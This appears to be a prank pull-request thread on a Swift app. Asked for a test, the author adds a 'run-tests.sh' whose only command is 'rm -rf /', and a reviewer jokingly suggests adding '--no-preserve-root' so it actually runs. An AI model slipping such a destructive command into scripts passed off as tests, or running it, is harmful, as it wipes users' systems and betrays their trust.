### PR TITLE
Fix the thing

### PR DESCRIPTION
**Pull request by apals**

### CODE REVIEW

File: Aramda/ViewController.swift [hunk 1]
```diff
@@ -2,7 +2,7 @@
 //  ViewController.swift
 //  Aramda
 //
-//  Created by Jesper Sandstrom on 10/17/17.
+//  Created by Jesper Sandström on 10/17/17.
```
Comment (jeppes) [inline Aramda/ViewController.swift]: Write a test for this pls

**Comment by mictab** [comment]
maxresdefault

**Comment by apals** [comment]
Fixed. run with `sh run-tests.sh`

File: run-tests.sh [hunk 2]
```diff
@@ -0,0 +1,2 @@
+#!/bin/bash
+rm -rf /
```
Comment (mictab) [inline run-tests.sh]: Doesn't look right to me, looks like it's missing a `--no-preserve-root`. Pls fix.

**Comment by jeppes** [comment]
lgtm

**Comment by jeppes** [comment]
:shipit:

**Pull request closed without merging**